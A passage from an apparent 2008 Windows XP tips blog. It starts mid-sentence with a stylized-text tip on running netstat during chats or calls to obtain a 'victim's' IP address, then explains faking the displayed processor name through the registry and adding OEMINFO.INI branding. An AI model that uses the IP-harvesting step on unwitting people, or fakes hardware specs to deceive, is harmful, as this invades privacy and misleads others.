ソσυ αяє ѕєη∂ιηg α ƒιℓє 2) ∂σ ηєтѕтαт-η ∂υяιηg ωнєη ソσυ αяє νι∂єσ ¢σηƒяєηѕιηg 3) ∂σ ηєтѕтαт-η ∂υяιηg ωнєη ソσυ αяє αυ∂ισ ¢σηƒяєηѕιηg ωнιℓω тнєѕє тнιηgѕ я ση тнєη тнєя вє¢σмєѕ α ∂ιяє¢т ℓιηк в/ω υ αη∂ тнє νι¢тιм αη∂ ソσυ ¢αη єαѕιℓソ gєт тнє ιρ σƒ тнє ρєяѕση..... ¢ソα ρσѕт ιƒ υ ωαηηα αѕк ηєтнιη єℓѕє тнαηкѕ.

Sunday, September 21, 2008

HOW TO DISPLY PENTIUM 5 OR EVEN MORE IN XP

NOW U CAN ABLE TO SHOW PENTIUM 5 AND EVEN MORE
I AM GIVING U THE TRICK BY WHICH YOU CAN NOW ABLE TO SHOW OR DISPLY EVEN PENTIUM 4 OR EVEN 5(EVEN U NOT HAVE THAT MUCH) AND PROCESSOR VALUE UPTO 3.0 HRTZ OR MORE THAN THIS

TYPE "REGEDIT" IN RUN BOX {START->RUN->TYPE REGEDIT}NOW CLICK IN H-KEY-LOCAL-MACHIN .
THEN ON HARDWARE.
THEN ON DISCRIPTION.
THEN ON SYSTEM,
THEN ON CentralProcessor.
THEN ON {H-KEY-LOCAL-MACHIN/HARDWARE/DISCRIPTION/SYSTEM/CentralProcessor/}NOW U GET IN RIGHT PANE THE VALUE THAT IS"ProcessorNameString"DOUBLE CLICK ON THIS VALUEVALUE NAME AND VALUE DATA IS NOW IN FROUNT OF U NOW IN DATA COLOM U CAN EDIT IT RANDOMLY WHAT U WANT IN PLACE OF THATVALUEAND THEN PRESS OK

NOW SEE SYSTEM PROPERTY JUST RIGHT CLICKING IN U ARE MY COMPUTER ICON OR SEE SYSTEM PROPERTY JUST BY PRESSING {WIN+PAUSE BREAK }

Branded Window with your photo in my computer property

open notepad
dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:
[General]Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here

Save the file,
then make a right click on my computer
select properties, in the general tab a button will be highlighted (support information) make a click on it,
you will be able to see the changes.
Now if you want to display some more information then simply increase the line in the file.
ex: Line4=Your Working Hours Here